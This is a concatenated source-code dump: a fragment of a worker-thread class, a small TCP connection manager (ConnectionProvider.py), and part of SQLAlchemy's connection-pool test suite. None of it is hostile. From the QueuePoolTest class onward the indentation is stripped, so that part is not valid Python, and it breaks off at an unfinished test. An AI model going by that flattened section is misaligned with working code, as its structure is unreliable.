                traceback.print_exc()

    def post_task(self, func, *args, **kwargs):
        """Queue *func(*args, **kwargs)* for execution on the worker thread."""
        self._task_queue.put(Task(func, *args, **kwargs))

    def stop(self):
        """Ask the worker loop to exit after the current task finishes."""
        self._run = False
|
ConnectionProvider.py | # -*- coding: UTF-8 -*-
import socket
import threading
import SystemHelpers
class ConnectionProvider(object):
    """Point-to-point TCP connection manager.

    The object can wait for one inbound peer as a server
    (``start_server_mode``) or dial out as a client
    (``start_connection``).  Either way the live socket is stored in
    ``self._connected_socket`` and a daemon reader thread forwards
    incoming data to the registered message callback.
    """

    def __init__(self, destination_ip='', server_port=20001, client_port=20002):
        self._destination_ip = destination_ip
        self._server_port = server_port
        self._client_port = client_port
        # Maximum bytes read per recv() call.  (Stray semicolon removed.)
        self._buffer_size = 1024
        # The established socket; None while disconnected.
        self._connected_socket = None
        # Callbacks default to print so the class works unconfigured.
        self._function_when_receive_message = print
        self._function_to_alert_user = print

    def set_client_port(self, port):
        """Set the local port bound when dialing out as a client."""
        self._client_port = port

    def set_server_port(self, port):
        """Set the port used to listen on / connect to the peer."""
        self._server_port = port

    def set_destination_ip(self, ip):
        """Set the peer address used by start_connection()."""
        self._destination_ip = ip

    def get_connected_socket(self):
        """Return the live socket, or None when disconnected."""
        return self._connected_socket

    def set_function_when_receive_message(self, function):
        """Register the callback invoked with each decoded incoming chunk."""
        self._function_when_receive_message = function

    def set_function_to_alert_user(self, function):
        """Register the callback used to surface connection errors."""
        self._function_to_alert_user = function

    def connected(self):
        """Return True when a connection is currently established."""
        if not self._connected_socket:
            return False
        return True

    def start_server_mode(self):
        """Accept a single inbound connection on a daemon thread."""
        t = threading.Thread(target=self._waiting_for_connection)
        t.daemon = True
        t.start()

    def start_connection(self):
        """Try to connect to the configured peer.

        :return: True on success, False when the attempt failed or when
            a client socket already exists and is connected.
        """
        if (not hasattr(self, '_client_socket')) or (not self.connected()):
            self._client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self._client_socket.bind(('', self._client_port))
            connection_stablished = True
            try:
                self._client_socket.connect((self._destination_ip, self._server_port))
                self._connected_socket = self._client_socket
                self._waiting_for_the_data()
            except ConnectionRefusedError:
                connection_stablished = False
                message = 'Connection Refused at ' + self._destination_ip +\
                    ':' + str(self._server_port)
                if self._function_to_alert_user:
                    self._function_to_alert_user(message)
                SystemHelpers.log_info(message)
            except Exception as e:
                connection_stablished = False
                message = str(e)
                SystemHelpers.log_debug(message)
            if not connection_stablished:
                # Failed attempt: discard the socket so a retry starts clean.
                self._client_socket.close()
                self._connected_socket = None
            return connection_stablished
        return False

    def send_message(self, message):
        """Send *message* to the peer, prefixed with 'message:'.

        :return: False when there is no active connection, else None.
        """
        if not self._connected_socket:
            return False
        if type(message) == bytes:
            message = message.decode()
        if type(message) == str:
            message = "message:" + message
        message = message.encode()
        self._connected_socket.sendall(message)

    def close_connection(self):
        """Close the active connection, if any.

        Bug fix: the original tested ``self._connection_activated``, an
        attribute never initialized anywhere in the class, so this
        method always raised AttributeError.  Connection state is
        actually tracked by ``self._connected_socket``; clearing it
        first also makes the reader loop exit.
        """
        sock = self._connected_socket
        if sock:
            self._connected_socket = None
            sock.close()

    def _waiting_for_connection(self):
        """Server side: block until one client connects, then read from it."""
        if not hasattr(self, '_server_socket'):
            self._server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self._server_socket.bind(('', self._server_port))
        self._server_socket.listen(1)
        conn, addr = self._server_socket.accept()
        self._connected_socket = conn
        # Remember the peer so a later outbound reconnect targets it.
        self._destination_ip, self._client_port = addr
        # One-shot server: stop listening once the peer is connected.
        self._server_socket.close()
        self._waiting_for_the_data()

    def _waiting_for_the_data(self):
        """Start the background reader thread for the live socket."""
        t = threading.Thread(target=self._waiting_for_the_data_function)
        t.daemon = True
        t.start()

    def _waiting_for_the_data_function(self):
        """Reader loop: forward each received chunk to the message callback."""
        while self._connected_socket:
            data = self._connected_socket.recv(self._buffer_size)
            if not data:
                # Empty read means the peer closed the connection.
                self._connected_socket = None
                return
            if self._function_when_receive_message:
                self._function_when_receive_message("received data:" + data.decode())
|
test_pool.py | import collections
import random
import threading
import time
import weakref
import sqlalchemy as tsa
from sqlalchemy import event
from sqlalchemy import pool
from sqlalchemy import select
from sqlalchemy import testing
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import eq_
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_not_
from sqlalchemy.testing import is_true
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing.mock import ANY
from sqlalchemy.testing.mock import call
from sqlalchemy.testing.mock import Mock
from sqlalchemy.testing.mock import patch
from sqlalchemy.testing.util import gc_collect
from sqlalchemy.testing.util import lazy_gc
join_timeout = 10
def MockDBAPI():  # noqa
    """Build a Mock that stands in for a DBAPI module.

    ``db.connect()`` returns mock connections whose ``close()`` flips
    their ``closed`` flag; ``db.shutdown(True)`` makes subsequent
    ``connect()`` calls raise, ``db.shutdown(False)`` restores them.
    """

    def cursor():
        return Mock()

    def connect(*arg, **kw):
        def close():
            connection.closed = True

        # mock seems like it might have an issue logging
        # call_count correctly under threading, not sure.
        # adding a side_effect for close seems to help.
        connection = Mock(
            cursor=Mock(side_effect=cursor),
            close=Mock(side_effect=close),
            closed=False,
        )
        return connection

    def shutdown(value):
        db.connect = (
            Mock(side_effect=Exception("connect failed"))
            if value
            else Mock(side_effect=connect)
        )
        db.is_shutdown = value

    db = Mock(
        connect=Mock(side_effect=connect), shutdown=shutdown, is_shutdown=False
    )
    return db
class PoolTestBase(fixtures.TestBase):
    """Shared setup/teardown and QueuePool fixtures for the pool tests."""

    def setup(self):
        pool.clear_managers()
        self._teardown_conns = []

    def teardown(self):
        # Close any connection registered via _with_teardown that is
        # still alive.
        for conn_ref in self._teardown_conns:
            live_conn = conn_ref()
            if live_conn:
                live_conn.close()

    @classmethod
    def teardown_class(cls):
        pool.clear_managers()

    def _with_teardown(self, connection):
        # Track via weakref so the registry itself doesn't keep the
        # connection alive.
        self._teardown_conns.append(weakref.ref(connection))
        return connection

    def _queuepool_fixture(self, **kw):
        _, queue_pool = self._queuepool_dbapi_fixture(**kw)
        return queue_pool

    def _queuepool_dbapi_fixture(self, **kw):
        dbapi = MockDBAPI()
        queue_pool = pool.QueuePool(
            creator=lambda: dbapi.connect("foo.db"), **kw
        )
        return dbapi, queue_pool
class PoolTest(PoolTestBase):
    """Core pool behaviors: cursor iteration, recreate, info dictionaries,
    and _ConnectionRecord lifecycle."""
    @testing.fails_on(
        "+pyodbc", "pyodbc cursor doesn't implement tuple __eq__"
    )
    @testing.fails_on("+pg8000", "returns [1], not (1,)")
    def test_cursor_iterable(self):
        # A raw DBAPI cursor should be directly iterable, yielding row tuples.
        conn = testing.db.raw_connection()
        cursor = conn.cursor()
        cursor.execute(str(select([1], bind=testing.db)))
        expected = [(1,)]
        for row in cursor:
            eq_(row, expected.pop(0))
    def test_no_connect_on_recreate(self):
        def creator():
            raise Exception("no creates allowed")
        for cls in (
            pool.SingletonThreadPool,
            pool.StaticPool,
            pool.QueuePool,
            pool.NullPool,
            pool.AssertionPool,
        ):
            # recreate() must not invoke the creator (it would raise here).
            p = cls(creator=creator)
            p.dispose()
            p2 = p.recreate()
            assert p2.__class__ is cls
            # Same check with a mock creator that errors after first use.
            mock_dbapi = MockDBAPI()
            p = cls(creator=mock_dbapi.connect)
            conn = p.connect()
            conn.close()
            mock_dbapi.connect.side_effect = Exception("error!")
            p.dispose()
            p.recreate()
    def test_info(self):
        # .info persists across checkin/checkout of the same record, is
        # cleared by invalidate(), and follows the connection on detach().
        p = self._queuepool_fixture(pool_size=1, max_overflow=0)
        c = p.connect()
        self.assert_(not c.info)
        self.assert_(c.info is c._connection_record.info)
        c.info["foo"] = "bar"
        c.close()
        del c
        c = p.connect()
        self.assert_("foo" in c.info)
        c.invalidate()
        c = p.connect()
        self.assert_("foo" not in c.info)
        c.info["foo2"] = "bar2"
        c.detach()
        self.assert_("foo2" in c.info)
        c2 = p.connect()
        is_not_(c.connection, c2.connection)
        assert not c2.info
        assert "foo2" in c.info
    def test_rec_info(self):
        # .record_info survives invalidate() (unlike .info) but is severed
        # from the fairy by detach().
        p = self._queuepool_fixture(pool_size=1, max_overflow=0)
        c = p.connect()
        self.assert_(not c.record_info)
        self.assert_(c.record_info is c._connection_record.record_info)
        c.record_info["foo"] = "bar"
        c.close()
        del c
        c = p.connect()
        self.assert_("foo" in c.record_info)
        c.invalidate()
        c = p.connect()
        self.assert_("foo" in c.record_info)
        c.record_info["foo2"] = "bar2"
        c.detach()
        is_(c.record_info, None)
        is_(c._connection_record, None)
        c2 = p.connect()
        assert c2.record_info
        assert "foo2" in c2.record_info
    def test_rec_unconnected(self):
        # test production of a _ConnectionRecord with an
        # initially unconnected state.
        dbapi = MockDBAPI()
        p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
        r1 = pool._ConnectionRecord(p1, connect=False)
        assert not r1.connection
        c1 = r1.get_connection()
        is_(c1, r1.connection)
    def test_rec_close_reopen(self):
        # test that _ConnectionRecord.close() allows
        # the record to be reusable
        dbapi = MockDBAPI()
        p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
        r1 = pool._ConnectionRecord(p1)
        c1 = r1.connection
        c2 = r1.get_connection()
        is_(c1, c2)
        r1.close()
        assert not r1.connection
        eq_(c1.mock_calls, [call.close()])
        c2 = r1.get_connection()
        is_not_(c1, c2)
        is_(c2, r1.connection)
        eq_(c2.mock_calls, [])
class PoolDialectTest(PoolTestBase):
    """Verify each pool class routes rollback/close through its dialect."""

    def _dialect(self):
        # Record every dialect call ("R" rollback, "C" commit, "CL" close)
        # so tests can assert the exact operation sequence.
        canary = []

        class PoolDialect(object):
            def do_rollback(self, dbapi_connection):
                canary.append("R")
                dbapi_connection.rollback()

            def do_commit(self, dbapi_connection):
                canary.append("C")
                dbapi_connection.commit()

            def do_close(self, dbapi_connection):
                canary.append("CL")
                dbapi_connection.close()

        return PoolDialect(), canary

    def _do_test(self, pool_cls, assertion):
        dialect, canary = self._dialect()
        dbapi = MockDBAPI()
        target_pool = pool_cls(creator=dbapi.connect)
        target_pool._dialect = dialect

        # One checkout/checkin cycle, a dispose/recreate, then another
        # cycle; the canary must match the expected sequence.
        target_pool.connect().close()
        target_pool.dispose()
        target_pool.recreate()
        target_pool.connect().close()

        eq_(canary, assertion)

    def test_queue_pool(self):
        self._do_test(pool.QueuePool, ["R", "CL", "R"])

    def test_assertion_pool(self):
        self._do_test(pool.AssertionPool, ["R", "CL", "R"])

    def test_singleton_pool(self):
        self._do_test(pool.SingletonThreadPool, ["R", "CL", "R"])

    def test_null_pool(self):
        self._do_test(pool.NullPool, ["R", "CL", "R", "CL"])

    def test_static_pool(self):
        self._do_test(pool.StaticPool, ["R", "R"])
class PoolEventsTest(PoolTestBase):
    """Tests for the pool event hooks (first_connect, connect, checkout,
    checkin, reset, invalidate, detach, close) and listener targeting."""
    # Fixtures: each returns (pool, canary) where the canary records which
    # events fired -- as a list of strings, or as a Mock for events whose
    # call arguments are also asserted.
    def _first_connect_event_fixture(self):
        p = self._queuepool_fixture()
        canary = []
        def first_connect(*arg, **kw):
            canary.append("first_connect")
        event.listen(p, "first_connect", first_connect)
        return p, canary
    def _connect_event_fixture(self):
        p = self._queuepool_fixture()
        canary = []
        def connect(*arg, **kw):
            canary.append("connect")
        event.listen(p, "connect", connect)
        return p, canary
    def _checkout_event_fixture(self):
        p = self._queuepool_fixture()
        canary = []
        def checkout(*arg, **kw):
            canary.append("checkout")
        event.listen(p, "checkout", checkout)
        return p, canary
    def _checkin_event_fixture(self):
        p = self._queuepool_fixture()
        canary = []
        def checkin(*arg, **kw):
            canary.append("checkin")
        event.listen(p, "checkin", checkin)
        return p, canary
    def _reset_event_fixture(self):
        p = self._queuepool_fixture()
        canary = []
        def reset(*arg, **kw):
            canary.append("reset")
        event.listen(p, "reset", reset)
        return p, canary
    def _invalidate_event_fixture(self):
        p = self._queuepool_fixture()
        canary = Mock()
        event.listen(p, "invalidate", canary)
        return p, canary
    def _soft_invalidate_event_fixture(self):
        p = self._queuepool_fixture()
        canary = Mock()
        event.listen(p, "soft_invalidate", canary)
        return p, canary
    def _close_event_fixture(self):
        p = self._queuepool_fixture()
        canary = Mock()
        event.listen(p, "close", canary)
        return p, canary
    def _detach_event_fixture(self):
        p = self._queuepool_fixture()
        canary = Mock()
        event.listen(p, "detach", canary)
        return p, canary
    def _close_detached_event_fixture(self):
        p = self._queuepool_fixture()
        canary = Mock()
        event.listen(p, "close_detached", canary)
        return p, canary
    def test_close(self):
        # "close" fires on dispose(), not on ordinary checkin.
        p, canary = self._close_event_fixture()
        c1 = p.connect()
        connection = c1.connection
        rec = c1._connection_record
        c1.close()
        eq_(canary.mock_calls, [])
        p.dispose()
        eq_(canary.mock_calls, [call(connection, rec)])
    def test_detach(self):
        p, canary = self._detach_event_fixture()
        c1 = p.connect()
        connection = c1.connection
        rec = c1._connection_record
        c1.detach()
        eq_(canary.mock_calls, [call(connection, rec)])
    def test_detach_close(self):
        p, canary = self._close_detached_event_fixture()
        c1 = p.connect()
        connection = c1.connection
        c1.detach()
        c1.close()
        eq_(canary.mock_calls, [call(connection)])
    def test_first_connect_event(self):
        p, canary = self._first_connect_event_fixture()
        p.connect()
        eq_(canary, ["first_connect"])
    def test_first_connect_event_fires_once(self):
        p, canary = self._first_connect_event_fixture()
        p.connect()
        p.connect()
        eq_(canary, ["first_connect"])
    def test_first_connect_on_previously_recreated(self):
        # A recreated pool gets its own first_connect.
        p, canary = self._first_connect_event_fixture()
        p2 = p.recreate()
        p.connect()
        p2.connect()
        eq_(canary, ["first_connect", "first_connect"])
    def test_first_connect_on_subsequently_recreated(self):
        p, canary = self._first_connect_event_fixture()
        p.connect()
        p2 = p.recreate()
        p2.connect()
        eq_(canary, ["first_connect", "first_connect"])
    def test_connect_event(self):
        p, canary = self._connect_event_fixture()
        p.connect()
        eq_(canary, ["connect"])
    def test_connect_event_fires_subsequent(self):
        p, canary = self._connect_event_fixture()
        c1 = p.connect()  # noqa
        c2 = p.connect()  # noqa
        eq_(canary, ["connect", "connect"])
    def test_connect_on_previously_recreated(self):
        p, canary = self._connect_event_fixture()
        p2 = p.recreate()
        p.connect()
        p2.connect()
        eq_(canary, ["connect", "connect"])
    def test_connect_on_subsequently_recreated(self):
        p, canary = self._connect_event_fixture()
        p.connect()
        p2 = p.recreate()
        p2.connect()
        eq_(canary, ["connect", "connect"])
    def test_checkout_event(self):
        p, canary = self._checkout_event_fixture()
        p.connect()
        eq_(canary, ["checkout"])
    def test_checkout_event_fires_subsequent(self):
        p, canary = self._checkout_event_fixture()
        p.connect()
        p.connect()
        eq_(canary, ["checkout", "checkout"])
    def test_checkout_event_on_subsequently_recreated(self):
        p, canary = self._checkout_event_fixture()
        p.connect()
        p2 = p.recreate()
        p2.connect()
        eq_(canary, ["checkout", "checkout"])
    def test_checkin_event(self):
        p, canary = self._checkin_event_fixture()
        c1 = p.connect()
        eq_(canary, [])
        c1.close()
        eq_(canary, ["checkin"])
    def test_reset_event(self):
        p, canary = self._reset_event_fixture()
        c1 = p.connect()
        eq_(canary, [])
        c1.close()
        eq_(canary, ["reset"])
    # For the invalidate events, positional arg 0 is the DBAPI connection
    # and arg 2 is the exception (None when invalidated without one).
    def test_soft_invalidate_event_no_exception(self):
        p, canary = self._soft_invalidate_event_fixture()
        c1 = p.connect()
        c1.close()
        assert not canary.called
        c1 = p.connect()
        dbapi_con = c1.connection
        c1.invalidate(soft=True)
        assert canary.call_args_list[0][0][0] is dbapi_con
        assert canary.call_args_list[0][0][2] is None
    def test_soft_invalidate_event_exception(self):
        p, canary = self._soft_invalidate_event_fixture()
        c1 = p.connect()
        c1.close()
        assert not canary.called
        c1 = p.connect()
        dbapi_con = c1.connection
        exc = Exception("hi")
        c1.invalidate(exc, soft=True)
        assert canary.call_args_list[0][0][0] is dbapi_con
        assert canary.call_args_list[0][0][2] is exc
    def test_invalidate_event_no_exception(self):
        p, canary = self._invalidate_event_fixture()
        c1 = p.connect()
        c1.close()
        assert not canary.called
        c1 = p.connect()
        dbapi_con = c1.connection
        c1.invalidate()
        assert canary.call_args_list[0][0][0] is dbapi_con
        assert canary.call_args_list[0][0][2] is None
    def test_invalidate_event_exception(self):
        p, canary = self._invalidate_event_fixture()
        c1 = p.connect()
        c1.close()
        assert not canary.called
        c1 = p.connect()
        dbapi_con = c1.connection
        exc = Exception("hi")
        c1.invalidate(exc)
        assert canary.call_args_list[0][0][0] is dbapi_con
        assert canary.call_args_list[0][0][2] is exc
    def test_checkin_event_gc(self):
        # Garbage collection of an unclosed fairy must also fire checkin.
        p, canary = self._checkin_event_fixture()
        c1 = p.connect()
        eq_(canary, [])
        del c1
        lazy_gc()
        eq_(canary, ["checkin"])
    def test_checkin_event_on_subsequently_recreated(self):
        p, canary = self._checkin_event_fixture()
        c1 = p.connect()
        p2 = p.recreate()
        c2 = p2.connect()
        eq_(canary, [])
        c1.close()
        eq_(canary, ["checkin"])
        c2.close()
        eq_(canary, ["checkin", "checkin"])
    def test_listen_targets_scope(self):
        # Listeners may target the Pool class, a pool instance, an engine
        # instance, or the engine class; all must fire in the listed order.
        canary = []
        def listen_one(*args):
            canary.append("listen_one")
        def listen_two(*args):
            canary.append("listen_two")
        def listen_three(*args):
            canary.append("listen_three")
        def listen_four(*args):
            canary.append("listen_four")
        engine = testing_engine(testing.db.url)
        event.listen(pool.Pool, "connect", listen_one)
        event.listen(engine.pool, "connect", listen_two)
        event.listen(engine, "connect", listen_three)
        event.listen(engine.__class__, "connect", listen_four)
        engine.execute(select([1])).close()
        eq_(
            canary, ["listen_one", "listen_four", "listen_two", "listen_three"]
        )
    def test_listen_targets_per_subclass(self):
        """test that listen() called on a subclass remains specific to
        that subclass."""
        canary = []
        def listen_one(*args):
            canary.append("listen_one")
        def listen_two(*args):
            canary.append("listen_two")
        def listen_three(*args):
            canary.append("listen_three")
        event.listen(pool.Pool, "connect", listen_one)
        event.listen(pool.QueuePool, "connect", listen_two)
        event.listen(pool.SingletonThreadPool, "connect", listen_three)
        p1 = pool.QueuePool(creator=MockDBAPI().connect)
        p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect)
        assert listen_one in p1.dispatch.connect
        assert listen_two in p1.dispatch.connect
        assert listen_three not in p1.dispatch.connect
        assert listen_one in p2.dispatch.connect
        assert listen_two not in p2.dispatch.connect
        assert listen_three in p2.dispatch.connect
        p1.connect()
        eq_(canary, ["listen_one", "listen_two"])
        p2.connect()
        eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"])
    def test_connect_event_fails_invalidates(self):
        # A connect listener that raises must leave the pool able to
        # produce a fresh, fully-initialized connection afterwards.
        fail = False
        def listen_one(conn, rec):
            if fail:
                raise Exception("it failed")
        def listen_two(conn, rec):
            rec.info["important_flag"] = True
        p1 = pool.QueuePool(
            creator=MockDBAPI().connect, pool_size=1, max_overflow=0
        )
        event.listen(p1, "connect", listen_one)
        event.listen(p1, "connect", listen_two)
        conn = p1.connect()
        eq_(conn.info["important_flag"], True)
        conn.invalidate()
        conn.close()
        fail = True
        assert_raises(Exception, p1.connect)
        fail = False
        conn = p1.connect()
        eq_(conn.info["important_flag"], True)
        conn.close()
    # NOTE(review): this overrides PoolTestBase.teardown without calling
    # the base version, so the base weakref connection cleanup is skipped
    # for this class -- confirm that is intended.
    def teardown(self):
        # TODO: need to get remove() functionality
        # going
        pool.Pool.dispatch._clear()
class PoolFirstConnectSyncTest(PoolTestBase):
    # test [ticket:2964]
    @testing.requires.timing_intensive
    def test_sync(self):
        """Concurrent checkouts must serialize behind a slow first_connect:
        exactly one first_connect, then one connect per pooled slot."""
        # NOTE: local name `pool` shadows the module-level sqlalchemy pool
        # import within this method.
        pool = self._queuepool_fixture(pool_size=3, max_overflow=0)
        evt = Mock()
        @event.listens_for(pool, "first_connect")
        def slow_first_connect(dbapi_con, rec):
            # Deliberately slow so the other threads pile up behind it.
            time.sleep(1)
            evt.first_connect()
        @event.listens_for(pool, "connect")
        def on_connect(dbapi_con, rec):
            evt.connect()
        def checkout():
            for j in range(2):
                c1 = pool.connect()
                time.sleep(0.02)
                c1.close()
                time.sleep(0.02)
        threads = []
        for i in range(5):
            th = threading.Thread(target=checkout)
            th.start()
            threads.append(th)
        for th in threads:
            th.join(join_timeout)
        # One first_connect followed by a connect for each of the three
        # pooled connections.
        eq_(
            evt.mock_calls,
            [
                call.first_connect(),
                call.connect(),
                call.connect(),
                call.connect(),
            ],
        )
class QueuePoolTest(PoolTestBase):
def test_queuepool_del(self):
self._do_testqueuepool(useclose=False)
def test_queuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1)
def status(pool):
return (
pool.size(),
pool.checkedin(),
pool.overflow(),
pool.checkedout(),
)
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
lazy_gc()
assert not pool._refs
def test_timeout_accessor(self):
expected_timeout = 123
p = self._queuepool_fixture(timeout=expected_timeout)
eq_(p.timeout(), expected_timeout)
@testing.requires.timing_intensive
def test_timeout(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=0, timeout=2)
c1 = p.connect() # noqa
c2 = p.connect() # noqa
c3 = p.connect() # noqa
now = time.time()
assert_raises(tsa.exc.TimeoutError, p.connect)
assert int(time.time() - now) == 2
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
# timeout again within the mutex, and if so, unlocking and throwing
# them back to the start of do_get()
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=lambda: dbapi.connect(delay=0.05),
pool_size=2,
max_overflow=1,
use_threadlocal=False,
timeout=3,
)
timeouts = []
def checkout():
for x in range(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
# normally, the timeout should under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
gc_collect()
dbapi = MockDBAPI()
mutex = threading.Lock()
def creator():
time.sleep(0.05)
with mutex:
return dbapi.connect()
p = pool.QueuePool(
creator=creator, pool_size=3, timeout=2, max_overflow=max_overflow
)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(0.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in range(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
self.assert_(max(peaks) <= max_overflow)
lazy_gc()
assert not pool._refs
def test_overflow_reset_on_failed_connect(self):
dbapi = Mock()
def failing_dbapi():
time.sleep(2)
raise Exception("connection failed")
creator = dbapi.connect
def create():
return creator()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
c1 = self._with_teardown(p.connect()) # noqa
c2 = self._with_teardown(p.connect()) # noqa
c3 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1)
creator = failing_dbapi
assert_raises(Exception, p.connect)
eq_(p._overflow, 1)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_hanging_connect_within_overflow(self):
"""test that a single connect() call which is hanging
does not block other connections from proceeding."""
dbapi = Mock()
mutex = threading.Lock()
def hanging_dbapi():
time.sleep(2)
with mutex:
return dbapi.connect()
def fast_dbapi():
with mutex:
return dbapi.connect()
creator = threading.local()
def create():
return creator.mock_connector()
def run_test(name, pool, should_hang):
if should_hang:
creator.mock_connector = hanging_dbapi
else:
creator.mock_connector = fast_dbapi
conn = pool.connect()
conn.operation(name)
time.sleep(1)
conn.close()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
threads = [
threading.Thread(target=run_test, args=("success_one", p, False)),
threading.Thread(target=run_test, args=("success_two", p, False)),
threading.Thread(target=run_test, args=("overflow_one", p, True)),
threading.Thread(target=run_test, args=("overflow_two", p, False)),
threading.Thread(
target=run_test, args=("overflow_three", p, False)
),
]
for t in threads:
t.start()
time.sleep(0.2)
for t in threads:
t.join(timeout=join_timeout)
eq_(
dbapi.connect().operation.mock_calls,
[
call("success_one"),
call("success_two"),
call("overflow_two"),
call("overflow_three"),
call("overflow_one"),
],
)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_waiters_handled(self):
"""test that threads waiting for connections are
handled when the pool is replaced.
"""
mutex = threading.Lock()
dbapi = MockDBAPI()
def creator():
mutex.acquire()
try:
return dbapi.connect()
finally:
mutex.release()
success = []
for timeout in (None, 30):
for max_overflow in (0, -1, 3):
p = pool.QueuePool(
creator=creator,
pool_size=2,
timeout=timeout,
max_overflow=max_overflow,
)
def waiter(p, timeout, max_overflow):
success_key = (timeout, max_overflow)
conn = p.connect()
success.append(success_key)
time.sleep(0.1)
conn.close()
c1 = p.connect() # noqa
c2 = p.connect()
threads = []
for i in range(2):
t = threading.Thread(
target=waiter, args=(p, timeout, max_overflow)
)
t.daemon = True
t.start()
threads.append(t)
# this sleep makes sure that the
# two waiter threads hit upon wait()
# inside the queue, before we invalidate the other
# two conns
time.sleep(0.2)
p._invalidate(c2)
for t in threads:
t.join(join_timeout)
eq_(len(success), 12, "successes: %s" % success)
def test_connrec_invalidated_within_checkout_no_race(self):
"""Test that a concurrent ConnectionRecord.invalidate() which
occurs after the ConnectionFairy has called
_ConnectionRecord.checkout()
but before the ConnectionFairy tests "fairy.connection is None"
will not result in an InvalidRequestError.
This use case assumes that a listener on the checkout() event
will be raising DisconnectionError so that a reconnect attempt
may occur.
"""
dbapi = MockDBAPI()
def creator():
return dbapi.connect()
p = pool.QueuePool(creator=creator, pool_size=1, max_overflow=0)
conn = p.connect()
conn.close()
_existing_checkout = pool._ConnectionRecord.checkout
@classmethod
def _decorate_existing_checkout(cls, *arg, **kw):
fairy = _existing_checkout(*arg, **kw)
connrec = fairy._connection_record
connrec.invalidate()
return fairy
with patch(
"sqlalchemy.pool._ConnectionRecord.checkout",
_decorate_existing_checkout,
):
conn = p.connect()
is_(conn._connection_record.connection, None)
conn.close()
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_notify_waiters(self):
dbapi = MockDBAPI()
canary = []
def creator():
canary.append(1)
return dbapi.connect()
p1 = pool.QueuePool(
creator=creator, pool_size=1, timeout=None, max_overflow=0
)
def waiter(p):
conn = p.connect()
canary.append(2)
time.sleep(0.5)
conn.close()
c1 = p1.connect()
threads = []
for i in range(5):
t = threading.Thread(target=waiter, args=(p1,))
t.start()
threads.append(t)
time.sleep(0.5)
eq_(canary, [1])
# this also calls invalidate()
# on c1
p1._invalidate(c1)
for t in threads:
t.join(join_timeout)
eq_(canary, [1, 1, 2, 2, 2, 2, 2])
def test_dispose_closes_pooled(self):
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=dbapi.connect, pool_size=2, timeout=None, max_overflow=0
)
c1 = p.connect()
c2 = p.connect()
c1_con = c1.connection
c2_con = c2.connection
c1.close()
eq_(c1_con.close.call_count, 0)
eq_(c2_con.close.call_count, 0)
p.dispose()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# currently, if a ConnectionFairy is closed
# after the pool has been disposed, there's no
# flag that states it should be invalidated
# immediately - it just gets returned to the
# pool normally...
c2.close()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# ...and that's the one we'll get back next.
c3 = p.connect()
assert c3.connection is c2_con
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_no_overflow(self):
self._test_overflow(40, 0)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_overflow_no_gc(self):
p = self._queuepool_fixture(pool_size=2, max_overflow=2)
# disable weakref collection of the
# underlying connections
strong_refs = set()
def _conn():
c = p.connect()
strong_refs.add(c.connection)
return c
for j in range(5):
# open 4 conns at a time. each time this
# will yield two pooled connections + two
# overflow connections.
conns = [_conn() for i in range(4)]
for c in conns:
c.close()
# doing that for a total of 5 times yields
# ten overflow connections closed plus the
# two pooled connections unclosed.
eq_(
set([c.close.call_count for c in strong_refs]),
set([1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0]),
)
def test_recycle(self):
